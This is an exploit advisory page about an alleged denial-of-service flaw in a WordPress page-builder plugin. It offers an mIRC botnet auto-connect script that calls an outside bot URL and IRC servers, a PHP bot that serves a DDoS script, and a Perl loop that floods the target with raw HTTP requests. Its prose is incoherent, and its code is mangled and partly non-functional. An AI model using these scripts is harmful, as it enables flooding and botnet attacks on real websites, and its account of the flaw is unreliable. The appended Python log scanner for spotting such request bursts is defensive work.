Wordpress Crash Ultimate Addons for Visual Composer vulnerability

2015.09.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/************************************************************************************************
[+] Exploit Title : Wordpress Crash Ultimate Addons for Visual Composer vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Tested on : Windows - Firefox
[+] Vendor Homepage : http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199
[+] Version: 3.12.0
*************************************************************************************************/

----------------------------------------
- vulnerability Ultimate_VC_Addons.php -
----------------------------------------

This Part visitors increased the pressure on the core WordPress, It is a denial of the exercise of visits
However, we try to write 0day to the target affect scenarios

Example : https://www.exploit-db.com/wp-content/plugins/Ultimate_VC_Addons/README

Our present method by transferring the channel expansion as we botnet this is the syntax mSL that you have to your script connect to other networks.

--->
{
    update_option('ultimate_vc_addons_redirect',true);
    $memory = ini_get('memory_limit');
    $allowed_memory = preg_replace("/[^0-9]/","",$memory)*1024*1024;
    $peak_memory = memory_get_peak_usage(true);
    if($allowed_memory - $peak_memory <= 14436352){
        $pre = __('Unfortunately, plugin could not be activated. Not enough memory available.','ultimate_vc');
        $sub = __('Please contact', 'ultimate_vc');
        trigger_error( $pre.' '.$sub.' <a href="https://www.brainstormforce.com/support/">'.__('plugin support', 'ultimate_vc').'</a>.',E_USER_ERROR );
    }
<---

---------------------------------------

=====================
= mSL Auto Connect: =
=====================

on *:Connect: {
    /url -an www.exmple.com/bot.php
}
on *:START:{
    server irc.network.com -i <nick> -j #channel,#channel
    server irc.network.com -i <nick> -j #channel,#channel
}

=====================
= PHP Bot =
=====================

<?php
error_reporting(0);
$file1 = 'DDoS.pl';
$file_headers = @get_headers($file1);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
    break;
}else {
    $s=file_get_contents($file1);
    echo $s;
}
?>

=====================
= DDoS Perl =
=====================

#!/usr/bin/perl
#
# Title : allowed memory size exhausted
# Author : Ashiyane Digital Security Team
# Improvement Code : Und3rgr0und
use IO::Socket;
$ip="127.0.0.1";
$port="80";
$counter =0;
@attackpattern=("'");
for ($x=0;$x<=600;$x++){
    $headerLine="GET /Ultimate_VC_Addons/ HTTP/1.0nn";
    @temp=split(/(/)/,$headerLine);
    foreach (@temp){
        $replaceme=$_;
        foreach(@attackpattern){
            $attack=$_;
            $newheaderline=$headerLine;
            $newheaderline=~ s/$replaceme/$attack/i;
            $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection impossiblen";
            print $remote $newheaderline;
            print "nRequest: ".$counter++." t".$newheaderline."n";
            $remote->close;
        }
    }
}

---------------------------------------

Discovered by : Und3rgr0und
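
For defenders, an added example (not part of the original advisory): a Python sketch that scans web-server access logs for bursts of requests naming the plugin directory, the repeated-request pattern the Perl loop above generates. The log format, threshold, window and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Access-log line (assumed format): ip - - [time] "request line" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')
PLUGIN_DIR = "ultimate_vc_addons"  # directory name from the advisory, lowercased
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_bursts(lines, threshold=20, window=timedelta(seconds=10)):
    """Return {client_ip: peak count} for clients that sent at least
    `threshold` requests naming the plugin directory within `window`."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines not in the expected format
        ip, ts_raw, request, _status = m.groups()
        # Match on the raw request line so malformed requests still count.
        if PLUGIN_DIR not in request.lower():
            continue
        ts = datetime.strptime(ts_raw, TS_FMT)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # drop timestamps that fell out of the window
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: one bursty client, one ordinary visitor."""
    t0 = datetime(2015, 9, 10, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{req}" {st} 512'
    burst = "GET /wp-content/plugins/Ultimate_VC_Addons/ HTTP/1.0"
    normal = "GET /wp-content/plugins/Ultimate_VC_Addons/assets/x.css HTTP/1.1"
    lines = []
    for i in range(30):           # 30 requests in 6 seconds from one address
        ts = (t0 + timedelta(seconds=i // 5)).strftime(TS_FMT)
        lines.append(fmt.format(ip="203.0.113.7", ts=ts, req=burst, st=403))
    for i in range(3):            # 3 requests spread over 3 minutes
        ts = (t0 + timedelta(minutes=i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="198.51.100.20", ts=ts, req=normal, st=200))
    return lines

if __name__ == "__main__":
    print(find_bursts(sample_log()))
```

Flagged addresses are candidates for rate limiting at the web server or WAF; the function expects each client's lines in chronological order, as an access log normally provides.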



Copyright 2017, cxsecurity.com

 
